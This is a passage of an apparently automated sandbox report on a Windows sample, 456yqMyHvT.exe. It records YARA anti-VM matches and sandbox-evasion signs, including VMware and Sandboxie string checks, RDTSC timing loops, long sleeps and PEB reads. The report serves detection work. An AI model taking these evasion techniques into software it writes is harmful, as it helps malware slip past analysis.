          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.456yqMyHvT.exe.31e8228.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 456yqMyHvT.exe PID: 6332, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: 456yqMyHvT.exe, 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: 456yqMyHvT.exe, 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\456yqMyHvT.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\456yqMyHvT.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 0000000000E59904 second address: 0000000000E5990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 0000000000E59B7E second address: 0000000000E59B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\456yqMyHvT.exe TID: 5152Thread sleep time: -40654s >= -30000s
          Source: C:\Users\user\Desktop\456yqMyHvT.exe TID: 6500Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\456yqMyHvT.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\456yqMyHvT.exeThread delayed: delay time: 40654
          Source: C:\Users\user\Desktop\456yqMyHvT.exeThread delayed: delay time: 922337203685477
          Source: 456yqMyHvT.exe, 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000008.00000000.756041921.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: 456yqMyHvT.exe, 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000008.00000000.738797128.000000000FD31000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}-B744-2::
          Source: explorer.exe, 00000008.00000000.786936792.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.756041921.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.756187684.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: explorer.exe, 00000008.00000000.718220664.000000000FD71000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}))
          Source: explorer.exe, 00000008.00000000.706978186.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000008.00000000.756187684.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: 456yqMyHvT.exe, 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000008.00000000.756280880.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: 456yqMyHvT.exe, 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\456yqMyHvT.exeCode function: 7_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\456yqMyHvT.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C637F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C31B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C31B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CDD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C52397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C38794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C54BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C54BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C54BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C3EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C3FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C53B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C53B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C4F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CE131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CBFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CBFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C24F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C24F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C68EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C536CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CDFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C52ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C376E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C52AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C516E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CBFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C3AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C3AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C29240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CB4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CDB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CDB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CF8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C3766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C6927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C58E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C38A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C43A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CDFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CB41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C3D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C3D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CD8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C4C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C52990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C5FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C535A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C4B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C4B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C63D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03CA3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C47D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C4C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C4C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C29100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C44120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C44120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C2AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 15_2_03C33D34 mov eax, dword ptr fs:[00000030h]
